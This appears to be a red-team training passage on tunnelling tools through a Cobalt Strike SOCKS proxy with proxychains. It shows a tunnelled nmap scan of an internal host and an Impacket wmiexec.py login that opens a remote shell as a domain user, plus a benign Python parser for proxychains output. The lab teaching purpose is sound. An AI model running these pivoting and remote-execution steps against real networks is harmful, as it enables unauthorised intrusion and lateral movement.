Linux Tools

proxychains is a tool that hooks the network calls of other applications so that their TCP connections are tunnelled over a SOCKS proxy. First, we need to modify its configuration file to point to our Cobalt Strike SOCKS proxy.

attacker@ubuntu ~> sudo vim /etc/proxychains.conf


At the bottom of the file, you will see a default entry for SOCKS4: socks4 127.0.0.1 9050. We need to change this to match the settings of the proxy we started.

  • SOCKS4: socks4 127.0.0.1 1080.

  • SOCKS5: socks5 127.0.0.1 1080 socks_user socks_password.

To tunnel a tool through proxychains, it's as simple as proxychains [tool] [tool args]. So to tunnel nmap, it would be:

attacker@ubuntu ~> proxychains nmap -n -Pn -sT -p445,3389,4444,5985 10.10.122.10
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2022-09-05 13:31 UTC
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:3389-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>>-10.10.122.10:4444-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:5985-<><>>-OK
Nmap scan report for 10.10.122.10
Host is up (0.061s latency).

PORT     STATE  SERVICE
445/tcp  open   microsoft-ds
3389/tcp open   ms-wbt-server
4444/tcp closed krb524
5985/tcp open   wsman

Nmap done: 1 IP address (1 host up) scanned in 15.31 seconds


There are some restrictions on the type of traffic that can be tunnelled, so you must adjust your tools as necessary. A SOCKS proxy only carries TCP connections, so ICMP (ping) and raw-packet SYN scans cannot be tunnelled; we must disable host discovery (-Pn) and use a full TCP connect scan (-sT) for this to work.
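Because every connection goes through the proxy, the |S-chain| lines are the quickest way to tell a port that is really closed from one the proxy could not reach at all. The following is an added example (not part of the course material) that parses those lines from the nmap run above, using the output as constructed sample input; the regular expression reflects the ProxyChains-3.1 line format shown on this page and is an assumption for other versions.

```python
import re
from collections import Counter

# Matches the per-connection status lines proxychains prints, e.g.
# |S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:3389-<><>-OK
# |S-chain|-<>-127.0.0.1:1080-<><>>-10.10.122.10:4444-<--timeout
# The "<>" run between hosts varies in length, so it is matched loosely.
CHAIN_RE = re.compile(
    r"^\|S-chain\|-<>-"
    r"(?P<proxy_host>[^:\s]+):(?P<proxy_port>\d+)"
    r"-[<>]+-"
    r"(?P<target_host>[^:\s]+):(?P<target_port>\d+)"
    r"-[<>-]*(?P<status>OK|timeout|denied)$"
)

# Constructed sample: the proxychains/nmap output from the run above.
SAMPLE_OUTPUT = """\
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2022-09-05 13:31 UTC
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:3389-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>>-10.10.122.10:4444-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:5985-<><>>-OK
Nmap scan report for 10.10.122.10
"""


def parse_chain_lines(output):
    """Return {(target_host, target_port): status} for every |S-chain|
    line in the tool's output. Lines that are not chain lines (nmap's
    own output, banners) are ignored."""
    results = {}
    for line in output.splitlines():
        m = CHAIN_RE.match(line.strip())
        if m:
            results[(m["target_host"], int(m["target_port"]))] = m["status"]
    return results


def status_counts(results):
    """Count how many tunnelled connections ended in each status."""
    return Counter(results.values())


def not_reached(results):
    """Sorted (host, port) pairs the proxy could not complete a connection to."""
    return sorted(k for k, v in results.items() if v != "OK")


if __name__ == "__main__":
    res = parse_chain_lines(SAMPLE_OUTPUT)
    print(dict(status_counts(res)))   # {'OK': 3, 'timeout': 1}
    print(not_reached(res))           # [('10.10.122.10', 4444)]
```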

You can also run tools from inside WSL on Windows.

ubuntu@DESKTOP-3BSK7NO ~ > proxychains wmiexec.py DEV/jking@10.10.122.30
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
|S-chain|-<>-10.10.5.50:1080-<><>-10.10.122.30:445-<><>-OK
[*] SMBv3.0 dialect used
|S-chain|-<>-10.10.5.50:1080-<><>-10.10.122.30:135-<><>-OK
|S-chain|-<>-10.10.5.50:1080-<><>-10.10.122.30:49667-<><>-OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
dev\jking

C:\>hostname
web
